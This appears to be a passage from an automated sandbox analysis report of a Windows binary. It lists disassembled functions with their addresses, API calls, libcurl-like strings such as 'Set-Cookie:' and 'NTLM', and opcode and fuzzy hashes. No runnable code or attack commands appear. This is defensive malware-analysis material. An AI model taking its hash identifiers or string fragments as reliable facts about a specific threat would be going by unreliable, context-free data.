    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CriticalHandleSectionTraits::$CloseEnterExclusiveFailureLeaveLockMicrosoft::UnlockWrappers::closesocket
    • String ID:
    • API String ID: 1633371138-0
    • Opcode ID: 1811bda86e6f52b995b0e5427fb1dffb24e59c4b147f9f6ada7111e99021b729
    • Instruction ID: 107d341cefb59887bd1da4c766eac6a477300715fd8ee5992ae43ce92970070e
    • Opcode Fuzzy Hash: 1811bda86e6f52b995b0e5427fb1dffb24e59c4b147f9f6ada7111e99021b729
    • Instruction Fuzzy Hash: 20415CB5D00204EFCB54EFA8D885A9DB7B6BF49300F118598E818AB351D735EE81CBD1
    Function 006DF75B Relevance: 6.1, APIs: 4, Instructions: 86COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 006D0570: _free.LIBCMT ref: 006D057E
      • Part of subcall function 006DF696: WideCharToMultiByte.KERNEL32(006FA414,00000000,?,?,?,?,?,?,00000008,006FA414,00000000,?,00000003,006FAD78,00000028,006D36A9), ref: 006DF738
    • GetLastError.KERNEL32 ref: 006DF7C3
    • __dosmaperr.LIBCMT ref: 006DF7CA
    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 006DF809
    • __dosmaperr.LIBCMT ref: 006DF810
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
    • String ID:
    • API String ID: 167067550-0
    • Opcode ID: 4cdc52a28bd6cdcf927bec1ed9bce06df0bbba5f2bed994fdc14b8657caf6c9b
    • Instruction ID: 57a642d806c1a4847bd4b4faf7680edb8bf6b9389efe8e85b73122bcc42e1ba5
    • Opcode Fuzzy Hash: 4cdc52a28bd6cdcf927bec1ed9bce06df0bbba5f2bed994fdc14b8657caf6c9b
    • Instruction Fuzzy Hash: 2C217771E0020AAFDB605FA59D81DAB77AFEF44368710853EF91A97350EB31EC0197A1
    Function 006D8D61 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(006FA414,?,?,006D2BC1,?,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8D66
    • _free.LIBCMT ref: 006D8DC3
    • _free.LIBCMT ref: 006D8DF9
    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8E04
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: cead8e2746561fd740354bd27569bb919d6f8cdda6b6b4b40a6b5d297e4acc27
    • Instruction ID: d5c07904ca77a536d8be2edb6ca391fbca31ff7c4131e425a50d766284ec3719
    • Opcode Fuzzy Hash: cead8e2746561fd740354bd27569bb919d6f8cdda6b6b4b40a6b5d297e4acc27
    • Instruction Fuzzy Hash: C6110C32E04201EEC66167756C8DDBB216BCFC1774725132BF314873E2DF258D1251A4
    Function 006D8EB8 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,?,?,006CAAEA,006D9030,?,?,006C18AE,?,?,?,?,?,006352BD,006BD8C4,?), ref: 006D8EBD
    • _free.LIBCMT ref: 006D8F1A
    • _free.LIBCMT ref: 006D8F50
    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,006C18AE,?,?,?,?,?,006352BD,006BD8C4,?,?,006BD8C4), ref: 006D8F5B
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: 78a118d727019e0d656c1dfb724be62768d8bc0581e5174394aa7a357f3b1172
    • Instruction ID: d28b4e323b4958cd9156091d59144747860632e62483988c2b501ef1af7a4d87
    • Opcode Fuzzy Hash: 78a118d727019e0d656c1dfb724be62768d8bc0581e5174394aa7a357f3b1172
    • Instruction Fuzzy Hash: 94110C32A04201EEC6626775AC89DBB225BD7C07B4725132BF214D73E1DF258D024258
    Function 006DCCD5 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
    Download Yara Rule
    APIs
    • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,006DCE3A,00000000,?,006E599E,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 006DCCEB
    • GetLastError.KERNEL32(?,006E599E,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,006DCE3A,00000000,00000104,?), ref: 006DCCF5
    • __dosmaperr.LIBCMT ref: 006DCCFC
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorFullLastNamePath__dosmaperr
    • String ID:
    • API String ID: 2398240785-0
    • Opcode ID: db81021ab534b0ef3bcceca6817c76957d98a25a6f756c65087cc4b75f2c0bf7
    • Instruction ID: 051c8e86a17cd4a02743d83f814c01f738fd70f1ef78ec52fdec17f543bb03c8
    • Opcode Fuzzy Hash: db81021ab534b0ef3bcceca6817c76957d98a25a6f756c65087cc4b75f2c0bf7
    • Instruction Fuzzy Hash: DFF0FF3160011ABBCB205FA6DC0499ABF6BFF453703108526B51986320DB31E811D7D0
    Function 006DCD3E Relevance: 6.0, APIs: 4, Instructions: 44COMMON
    Download Yara Rule
    APIs
    • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,006DCE3A,00000000,?,006E5929,00000000,00000000,006DCE3A,?,?,00000000,00000000,00000001), ref: 006DCD54
    • GetLastError.KERNEL32(?,006E5929,00000000,00000000,006DCE3A,?,?,00000000,00000000,00000001,00000000,00000000,?,006DCE3A,00000000,00000104), ref: 006DCD5E
    • __dosmaperr.LIBCMT ref: 006DCD65
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorFullLastNamePath__dosmaperr
    • String ID:
    • API String ID: 2398240785-0
    • Opcode ID: 0df9f02897d81b4606196e0042b8065a90f9f5edb48a8426d24a1345e68b52d1
    • Instruction ID: 9380f658880b5593f98783effa44ad72171e47cdb0e9c78d9bc78091c33b9322
    • Opcode Fuzzy Hash: 0df9f02897d81b4606196e0042b8065a90f9f5edb48a8426d24a1345e68b52d1
    • Instruction Fuzzy Hash: 87F0FF31A0051ABFCB605BA2DC04D96BF6BFE453703108526F519C6620DB31D811DBD0
    Function 006E64BF Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • WriteConsoleW.KERNEL32(00000000,?,5C2E5C5C,00000000,00000000,?,006E3622,00000000,00000001,00000000,00000000,?,006D761D,00000000,?,00000000), ref: 006E64D6
    • GetLastError.KERNEL32(?,006E3622,00000000,00000001,00000000,00000000,?,006D761D,00000000,?,00000000,00000000,00000000,?,006D7B71,00000000), ref: 006E64E2
      • Part of subcall function 006E64A8: CloseHandle.KERNEL32(FFFFFFFE,006E64F2,?,006E3622,00000000,00000001,00000000,00000000,?,006D761D,00000000,?,00000000,00000000,00000000), ref: 006E64B8
    • ___initconout.LIBCMT ref: 006E64F2
      • Part of subcall function 006E646A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006E6499,006E360F,00000000,?,006D761D,00000000,?,00000000,00000000), ref: 006E647D
    • WriteConsoleW.KERNEL32(00000000,?,5C2E5C5C,00000000,?,006E3622,00000000,00000001,00000000,00000000,?,006D761D,00000000,?,00000000,00000000), ref: 006E6507
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
    • String ID:
    • API String ID: 2744216297-0
    • Opcode ID: a72bac000c318c1548f6d318eca60fa1511dfadd618abb0f5465eca7ba819814
    • Instruction ID: 79f0460a889f2f46e56bed813c5f8094da6babcd829d9635904814122f43e537
    • Opcode Fuzzy Hash: a72bac000c318c1548f6d318eca60fa1511dfadd618abb0f5465eca7ba819814
    • Instruction Fuzzy Hash: 6DF03036101296FFCFA22F96ED54ACA3F67FB187B1B008010FE1886171DA32C820DB95
    Function 0064DA36 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 495COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID:
    • String ID: Downgrades to HTTP/1.1!$\
    • API String ID: 0-71446353
    • Opcode ID: 837c31c93f8055eb7bdac75011801ee9764af1554ad5437e92e95f46c1d217ce
    • Instruction ID: c0ebc1e444849f6657fd2958c384d18c8a780e712bef13d0f83642646a5d26f9
    • Opcode Fuzzy Hash: 837c31c93f8055eb7bdac75011801ee9764af1554ad5437e92e95f46c1d217ce
    • Instruction Fuzzy Hash: 3C227BB4E00209DFDB64DF58C885BEAB7B2BF49304F1482A9E8195B381D7359992CF91
    Function 0066CE00 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 422COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0066D388
    Strings
    • Failed to alloc scratch buffer!, xrefs: 0066D06D
    • We are completely uploaded and fine, xrefs: 0066D2C4
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Failed to alloc scratch buffer!$We are completely uploaded and fine
    • API String ID: 930174750-607151321
    • Opcode ID: 717ebcee3e0de4df0bf8c8a6e9cbc56126849c571419a67083dee1397b0cba07
    • Instruction ID: 369aa8de0354ddbba1860d93742a9e0de2f36cc87b04f91bc6f7d3375eef45e5
    • Opcode Fuzzy Hash: 717ebcee3e0de4df0bf8c8a6e9cbc56126849c571419a67083dee1397b0cba07
    • Instruction Fuzzy Hash: C812EB74A00209DFDB04CF98C495AEEB7F2BF49314F2481A9E849AB355D731AE42CF95
    Function 006B684E Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 293COMMON
    Download Yara Rule
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 006B6BB1
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006B6FCB
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8___from_strstr_to_strchr
    • String ID: 0123456789-
    • API String ID: 88142382-3850129594
    • Opcode ID: 1545f98ff9025fc5edb47e7b195f8e86a6b204a2eefce1ad5c05edb3aecf65d7
    • Instruction ID: 05922c261367ca92526d17a3c2b4a4e9757368f70ba31f3eaefc390bc24f6fc4
    • Opcode Fuzzy Hash: 1545f98ff9025fc5edb47e7b195f8e86a6b204a2eefce1ad5c05edb3aecf65d7
    • Instruction Fuzzy Hash: A8D1C9B5904259CFCB08CF84D494AFEBBB2BF49304F248549E8156B356C379E982CFA5
    Function 0064D3B4 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 273COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID:
    • String ID: 7$7
    • API String ID: 0-2536533678
    • Opcode ID: 880485ab9dfaf2a56aad19bb6ff07e68db6320949b24677b7bdef49be001b2ff
    • Instruction ID: d888c2cc7a82cd413ba9a7b4faf444caf503eee4cdd254ce7b4f60ac501123ce
    • Opcode Fuzzy Hash: 880485ab9dfaf2a56aad19bb6ff07e68db6320949b24677b7bdef49be001b2ff
    • Instruction Fuzzy Hash: A0B1CFB1E00209DBDB24DF64D845BEEB7B2BF45304F1482A9E9186B382D735D992CF61
    Function 006D1947 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: __aulldvrm
    • String ID: +$-
    • API String ID: 1302938615-2137968064
    • Opcode ID: 87be8906a39fdc7d4e727b398545d24e26840713610a19b7e63d6b3b1ad24345
    • Instruction ID: 863ce997bd2a79d7f0b797d37e11e94255626b6d217e3a33f5f1bf418fe245f1
    • Opcode Fuzzy Hash: 87be8906a39fdc7d4e727b398545d24e26840713610a19b7e63d6b3b1ad24345
    • Instruction Fuzzy Hash: C091B430D05149BFDF14CE69C4A16FDBBB2EF57360F18825BE865AF391D2B089428B51
    Function 006AE9E0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 244COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006AECA7
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: NTLM$NTLM
    • API String ID: 930174750-1640376890
    • Opcode ID: 478003884a99082d35423df66724a50644629bf46659bf1d12fa992a3fd9f667
    • Instruction ID: 591d5a51833ab65cd44549e3ff221c32982fd8840e3c21ba37b8cbfbf3038415
    • Opcode Fuzzy Hash: 478003884a99082d35423df66724a50644629bf46659bf1d12fa992a3fd9f667
    • Instruction Fuzzy Hash: A6917FB5A00109DFCB54EF58D885BDAB7B6BB49310F108219F9159B381C735ED82CFA1
    Function 0066A360 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 238COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: No URL set!$No URL set!
    • API String ID: 1951014933-3360990844
    • Opcode ID: 9cac80689a3aa39402233977467c86fda0c194a4c6725ad702541edc98ebeb99
    • Instruction ID: ec4522da59a01e6dffa8954fbcc87f325e1b07d696f56cf3c4b8a6632836f4c8
    • Opcode Fuzzy Hash: 9cac80689a3aa39402233977467c86fda0c194a4c6725ad702541edc98ebeb99
    • Instruction Fuzzy Hash: 69B10A74600249DFDB04CF58C498BEA7BA2BF49354F1881B9E84D9F742D735AA81CF82
    Function 006A6C70 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: %lx
    • API String ID: 1951014933-1448181948
    • Opcode ID: 71adfa0552cc50dfddd3afd41f3223c61bf98fa25e52e0c3b1e4c63e28161453
    • Instruction ID: 0239f0a9fa05eeba6621bcf28e9813775363d365b54cf95890819619d08b54bc
    • Opcode Fuzzy Hash: 71adfa0552cc50dfddd3afd41f3223c61bf98fa25e52e0c3b1e4c63e28161453
    • Instruction Fuzzy Hash: 8EA10874E00219CBDB24EF98D844BEDBBB2FF46318F188259E465A7285DB305D86CF61
    Function 006504A0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID:
    • String ID: Set-Cookie:$Set-Cookie:
    • API String ID: 0-1461884226
    • Opcode ID: fde483fff2adc7c8ef3c7ea474f7ea932e1d4c950d167a6534a882220f99348e
    • Instruction ID: e63becba296633f0b82755a581dff716c0b7aae099856da81cbb8aed307a6b0f
    • Opcode Fuzzy Hash: fde483fff2adc7c8ef3c7ea474f7ea932e1d4c950d167a6534a882220f99348e
    • Instruction Fuzzy Hash: 5B917EB0D04209EFEF10DFA8C9457EEBBB2AB44305F148169ED0967341E775AA44CBA6
    Function 006544F0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0065479A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: =$=
    • API String ID: 930174750-3372962515
    • Opcode ID: b8f022f784eaf568542f08adca8fae4eeb084646b58ce48a6dab0b15895146a6
    • Instruction ID: 0e06d02305a8fe5886305bc3f30cf70005e7283396bd05c8e18b61fd851305be
    • Opcode Fuzzy Hash: b8f022f784eaf568542f08adca8fae4eeb084646b58ce48a6dab0b15895146a6
    • Instruction Fuzzy Hash: A1915974D04248DFCF14CF98D894BEDBBB2AF4A309F248199E8156B381DB759E89CB50
    Function 006900A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 183COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006902A6
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: (){ %*]
    • API String ID: 930174750-731572209
    • Opcode ID: de5419b54659fa026659d6887af7bd57dc806f860e7d55a22eee1ad6f614ee1b
    • Instruction ID: f7dce26e863780adf6333b3fc20003d4b94bac874a5524d19d1e6d0be096248e
    • Opcode Fuzzy Hash: de5419b54659fa026659d6887af7bd57dc806f860e7d55a22eee1ad6f614ee1b
    • Instruction Fuzzy Hash: 4E717DB0E052599FEF04CFA8D891BFEBBB6BF49305F148059E811AB741C7359A41CBA4
    Function 0068C530 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0068DD50: @_RTC_CheckStackVars@8.LIBCMT ref: 0068DE2F
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068C76C
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    Strings
    Memory Dump Source
